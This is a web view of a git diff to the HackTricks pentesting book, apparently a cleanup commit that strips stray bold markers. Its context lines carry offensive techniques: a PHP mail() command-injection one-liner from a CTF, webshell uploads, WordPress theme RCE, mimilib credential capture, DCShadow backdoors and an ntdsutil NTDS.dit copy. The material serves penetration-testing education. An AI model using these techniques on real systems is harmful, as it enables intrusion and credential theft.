**mail / mb\_send\_mail** - **** This function is used to send mails, but it can also be abused to inject arbitrary commands inside the `$options` parameter. This is because **php `mail` function** usually call `sendmail` binary inside the system and it allows you to **put extra options**. However, you won't be able to see the output of the executed command, so it's recommended to create shell script that writes the output to a file, execute it using mail, and print the output:
|
||||
**mail / mb\_send\_mail** - This function is used to send mails, but it can also be abused to inject arbitrary commands inside the `$options` parameter. This is because **php `mail` function** usually call `sendmail` binary inside the system and it allows you to **put extra options**. However, you won't be able to see the output of the executed command, so it's recommended to create shell script that writes the output to a file, execute it using mail, and print the output:
|
||||
|
||||
```bash
|
||||
file_put_contents('/www/readflag.sh', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA+IC90bXAvZmxhZy50eHQKCg==')); chmod('/www/readflag.sh', 0777); mail('', '', '', '', '-H \"exec /www/readflag.sh\"'); echo file_get_contents('/tmp/flag.txt');
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
A **HTTP Server with WebDav** active is a server where you probably can **update, delete, move, copy** files. **Sometimes** you **need** to have **valid credentials** (usually check with HTTP Basic Authentication).
|
||||
|
||||
You should try to **upload** some **webshell** and **execute** it from the web server to take control over the server.\
|
||||
Usually, to **connect** a WebDav server you will need valid **credentials**: [**WebDav bruteforce**](../../brute-force.md#http-basic-auth) **** _(Basic Auth)_.
|
||||
Usually, to **connect** a WebDav server you will need valid **credentials**: [**WebDav bruteforce**](../../brute-force.md#http-basic-auth) _(Basic Auth)_.
|
||||
|
||||
Other common configuration is to **forbid uploading** files with **extensions** that will be **executed** by the web server, you should check how to **bypass this:**
|
||||
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
## Basic Information
|
||||
|
||||
**Uploaded** files go to: _http://10.10.10.10/wp-content/uploads/2018/08/a.txt_\
|
||||
__**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: **** Using **theme twentytwelve** you can **access** the **404.php** file in**:** [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)****\
|
||||
__**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in**:** [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)****\
|
||||
**Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)****
|
||||
|
||||
In **wp-config.php** you can find the root password of the database.
|
||||
|
@ -159,7 +159,7 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one *
|
|||
|
||||
![](../../.gitbook/assets/1\_JaUYIZF8ZjDGGB7ocsZC-g.png)
|
||||
|
||||
If you get **faultCode** with **** a value **greater** then **0** (17), it means the port is open.
|
||||
If you get **faultCode** with a value **greater** then **0** (17), it means the port is open.
|
||||
|
||||
Take a look to the use of **`system.multicall`**in the previous section to learn how to abuse this method to cause DDoS.
|
||||
|
||||
|
@ -314,7 +314,7 @@ Some time logon users do not own writable authorization to make modifications to
|
|||
|
||||
So, once you have access to a WordPress dashboard, you can attempt installing a malicious plugin. Here I’ve already downloaded the vulnerable plugin from exploit db.
|
||||
|
||||
Click [**here**](https://www.exploit-db.com/exploits/36374) **** to download the plugin for practice.
|
||||
Click [**here**](https://www.exploit-db.com/exploits/36374) to download the plugin for practice.
|
||||
|
||||
![](https://i1.wp.com/1.bp.blogspot.com/-Y\_Aw7zSFJZs/XY9pymSjdvI/AAAAAAAAguY/FGyGEzlx9VIqNYyyra9r55IklNmwXwMQwCLcBGAsYHQ/s1600/10.png?w=687\&ssl=1)
|
||||
|
||||
|
|
|
@ -181,7 +181,7 @@ You can see the stack for example inside a hex dump:
|
|||
|
||||
### Deobfuscating shellcode and getting executed functions
|
||||
|
||||
You should try **** [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152).\
|
||||
You should try [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7\&pid=152).\
|
||||
It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding** itself in memory.
|
||||
|
||||
```bash
|
||||
|
@ -264,8 +264,8 @@ If you get the **binary** of a GBA game you can use different tools to **emulate
|
|||
|
||||
* ****[**no$gba**](https://problemkaputt.de/gba.htm) (_Download the debug version_) - Contains a debugger with interface
|
||||
* ****[**mgba** ](https://mgba.io)- Contains a CLI debugger
|
||||
* ****[**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) **** - Ghidra plugin
|
||||
* [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA) **** - Ghidra plugin
|
||||
* ****[**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) - Ghidra plugin
|
||||
* [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA) - Ghidra plugin
|
||||
|
||||
In [**no$gba**](https://problemkaputt.de/gba.htm), in _**Options --> Emulation Setup --> Controls**_** ** you can see how to press the Game Boy Advance **buttons**
|
||||
|
||||
|
|
|
@ -63,7 +63,7 @@ So, start by performing a scan of type "**Unknown initial value**":
|
|||
|
||||
![](<../../.gitbook/assets/image (589).png>)
|
||||
|
||||
Then, make the value change, indicate **how** the **value** **changed** (in my case it was decreased by 1) **** and perform a **next scan**:
|
||||
Then, make the value change, indicate **how** the **value** **changed** (in my case it was decreased by 1) and perform a **next scan**:
|
||||
|
||||
![](<../../.gitbook/assets/image (590).png>)
|
||||
|
||||
|
|
|
@ -8,7 +8,7 @@ You can create you **own SSP** to **capture** in **clear text** the **credential
|
|||
#### Mimilib
|
||||
|
||||
You can use the `mimilib.dll` binary provided by Mimikatz. **This will log inside a file all the credentials in clear text.**\
|
||||
****Drop the dll in **** `C:\Windows\System32\`\
|
||||
****Drop the dll in `C:\Windows\System32\`\
|
||||
Get a list existing LSA Security Packages:
|
||||
|
||||
{% code title="attacker@target" %}
|
||||
|
|
|
@ -37,7 +37,7 @@ You can push the changes from a DA or from a user with this minimal permissions:
|
|||
* The **target object**:
|
||||
* _WriteProperty_ (Not Write)
|
||||
|
||||
You can use **** [**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1) to give these privileges to an unprivileged user (notice that this will leave some logs). This is much more restrictive than having DA privileges.\
|
||||
You can use [**Set-DCShadowPermissions**](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1) to give these privileges to an unprivileged user (notice that this will leave some logs). This is much more restrictive than having DA privileges.\
|
||||
For example: `Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose` This means that the username _**student1**_ when logged on in the machine _**mcorp-student1**_ has DCShadow permissions over the object _**root1user**_.
|
||||
|
||||
### Using DCShadow to create backdoors
|
||||
|
|
|
@ -6,7 +6,7 @@ This is similar to the basic [Constrained Delegation](constrained-delegation.md)
|
|||
|
||||
In this case, the constrained object will have an attribute called _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ with the name of the user that can impersonate any other user against it.
|
||||
|
||||
Another important difference from this Constrained Delegation to the other delegations is that any user with **write permissions over a machine account** (_GenericAll/GenericWrite/WriteDacl/WriteProperty/etc_) **** can set the _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ (In the other forms of Delegation you needed domain admin privs).
|
||||
Another important difference from this Constrained Delegation to the other delegations is that any user with **write permissions over a machine account** (_GenericAll/GenericWrite/WriteDacl/WriteProperty/etc_) can set the _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ (In the other forms of Delegation you needed domain admin privs).
|
||||
|
||||
### New Concepts
|
||||
|
||||
|
@ -21,7 +21,7 @@ However, if the **TGS** used in **S4U2Proxy** is **NOT Forwardable** trying to a
|
|||
|
||||
Suppose that the attacker has already **write equivalent privileges over the victim computer**.
|
||||
|
||||
1. The attacker **compromises** an account that has a **SPN** or **creates one** (“Service A”). Note that **any** _Admin User_ without any other special privilege can **create** up **** until 10 **Computer objects (**_**MachineAccountQuota**_**)** and set them a **SPN**. So the attacker can just create a Computer object and set a SPN.
|
||||
1. The attacker **compromises** an account that has a **SPN** or **creates one** (“Service A”). Note that **any** _Admin User_ without any other special privilege can **create** up until 10 **Computer objects (**_**MachineAccountQuota**_**)** and set them a **SPN**. So the attacker can just create a Computer object and set a SPN.
|
||||
2. The attacker configures **resource-based constrained delegation from Service A to the victim host**. 
|
||||
3. The attacker uses Rubeus to perform a **full S4U attack** (S4U2Self and S4U2Proxy) from Service A to Service B for a user **with privileged access to Service B**. 
|
||||
1. S4U2Self (from the SPN compromised/created account): Ask for a **TGS of Administrator to me** (Not Forwardable).
|
||||
|
|
|
@ -86,7 +86,7 @@ If you want to **share some tricks with the community** you can also submit **pu
|
|||
* [ ] [**Windows Vault**](windows-local-privilege-escalation/#windows-vault) credentials that you could use?
|
||||
* [ ] Interesting [**DPAPI credentials**](windows-local-privilege-escalation/#dpapi)?
|
||||
* [ ] Passwords of saved [**Wifi networks**](windows-local-privilege-escalation/#wifi)?
|
||||
* [ ] Interesting info in **** [**saved RDP Connections**](windows-local-privilege-escalation/#saved-rdp-connections)?
|
||||
* [ ] Interesting info in [**saved RDP Connections**](windows-local-privilege-escalation/#saved-rdp-connections)?
|
||||
* [ ] Passwords in [**recently run commands**](windows-local-privilege-escalation/#recently-run-commands)?
|
||||
* [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/#remote-desktop-credential-manager) passwords?
|
||||
* [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/#appcmd-exe)? Credentials?
|
||||
|
@ -122,8 +122,8 @@ If you want to **share some tricks with the community** you can also submit **pu
|
|||
|
||||
|
||||
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **** join the [💬](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
|
||||
****If you want to **share some tricks with the community** you can also submit **pull requests** to **** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) **** that will be reflected in this book.\
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
|
||||
****If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\
|
||||
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
|
||||
|
||||
![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (4).png>)
|
||||
|
|
|
@ -1,3 +1,3 @@
|
|||
# WinRM
|
||||
|
||||
For information about **** [**WinRM read this page**](../../pentesting/5985-5986-pentesting-winrm.md).
|
||||
For information about [**WinRM read this page**](../../pentesting/5985-5986-pentesting-winrm.md).
|
||||
|
|
|
@ -220,7 +220,7 @@ Available since Windows Server 2008.
|
|||
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
|
||||
```
|
||||
|
||||
You could also use the [**volume shadow copy**](./#stealing-sam-and-system) **** trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) **** trick).
|
||||
You could also use the [**volume shadow copy**](./#stealing-sam-and-system) trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) trick).
|
||||
|
||||
### **Extracting hashes from NTDS.dit**
|
||||
|
||||
|
|
|
@ -37,7 +37,7 @@ From [https://www.itprotoday.com/windows-10/what-credential-guard](https://www.i
|
|||
More information and a PS1 script to enable Credential Guard [can be found here](https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage).
|
||||
|
||||
In this case **Mimikatz cannot do much to bypass** this and extract the hashes from LSASS. But you could always add your **custom SSP** and **capture the credentials** when a user tries to login in **clear-text**.\
|
||||
More information about **** [**SSP and how to do this here**](../active-directory-methodology/custom-ssp.md).
|
||||
More information about [**SSP and how to do this here**](../active-directory-methodology/custom-ssp.md).
|
||||
|
||||
Credentials Guard could be **enable in different ways**. To check if it was enabled using the registry you could check the value of the key _**LsaCfgFlags**_ in _**HKLM\System\CurrentControlSet\Control\LSA**_. If the value is **"1"** the it is active with UEFI lock, if **"2"** is active without lock and if **"0"** it's not enabled.\
|
||||
This is **not enough to enable Credentials Guard** (but it's a strong indicator).\
|
||||
|
|
|
@ -1431,21 +1431,21 @@ If you manages to **hijack a dll** being **loaded** by a **process** running as
|
|||
|
||||
****[**PrivescCheck** ](https://github.com/itm4n/PrivescCheck)****\
|
||||
****[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) -- Check for misconfigurations and sensitive files ([check here](broken-reference)). Detected.\
|
||||
[**JAWS**](https://github.com/411Hall/JAWS) **** -- Check for some possible misconfigurations and gather info ([check here](broken-reference)).\
|
||||
[**JAWS**](https://github.com/411Hall/JAWS) -- Check for some possible misconfigurations and gather info ([check here](broken-reference)).\
|
||||
[**privesc** ](https://github.com/enjoiz/Privesc)-- Check for misconfigurations\
|
||||
[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **** -- It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information. Use **-Thorough** in local.\
|
||||
[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **** -- Extracts crendentials from Credential Manager. Detected.\
|
||||
[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **** -- Spray gathered passwords across domain\
|
||||
[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **** -- Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool.\
|
||||
[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) -- It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information. Use **-Thorough** in local.\
|
||||
[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) -- Extracts crendentials from Credential Manager. Detected.\
|
||||
[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) -- Spray gathered passwords across domain\
|
||||
[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) -- Inveigh is a PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool.\
|
||||
[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) -- Basic privesc Windows enumeration\
|
||||
[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) ~~****~~ -- Search for known privesc vulnerabilities (DEPRECATED for Watson)\
|
||||
[~~**WINspect**~~](https://github.com/A-mIn3/WINspect) ~~****~~ -- Local checks **(Need Admin rights)**
|
||||
|
||||
#### Exe
|
||||
|
||||
[**Watson**](https://github.com/rasta-mouse/Watson) **** -- Search for known privesc vulnerabilities (needs to be compiled using VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\
|
||||
[**SeatBelt**](https://github.com/GhostPack/Seatbelt) **** -- Enumerates the host searching for misconfigurations (more a gather info tool than privesc) (needs to be compiled) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
|
||||
****[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **** -- Extracts credentials from lots of softwares (precompiled exe in github)\
|
||||
[**Watson**](https://github.com/rasta-mouse/Watson) -- Search for known privesc vulnerabilities (needs to be compiled using VisualStudio) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\
|
||||
[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- Enumerates the host searching for misconfigurations (more a gather info tool than privesc) (needs to be compiled) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\
|
||||
****[**LaZagne**](https://github.com/AlessandroZ/LaZagne) -- Extracts credentials from lots of softwares (precompiled exe in github)\
|
||||
[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) ~~****~~ -- Check for misconfiguration (executable precompiled in github). Not recommended. It does not work well in Win10.\
|
||||
[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- Check for possible misconfigurations (exe from python). Not recommended. It does not work well in Win10.
|
||||
|
||||
|
|
|
@ -88,4 +88,4 @@ Full token privileges cheatsheet at [https://github.com/gtworek/Priv2Admin](http
|
|||
## Reference
|
||||
|
||||
* Take a look to this table defining Windows tokens: [https://github.com/gtworek/Priv2Admin](https://github.com/gtworek/Priv2Admin)
|
||||
* Take a look to [**this paper**](https://github.com/hatRiot/token-priv/blob/master/abusing\_token\_eop\_1.0.txt) **** about privesc with tokens**.**
|
||||
* Take a look to [**this paper**](https://github.com/hatRiot/token-priv/blob/master/abusing\_token\_eop\_1.0.txt) about privesc with tokens**.**
|
||||
|
|
Loading…
Reference in a new issue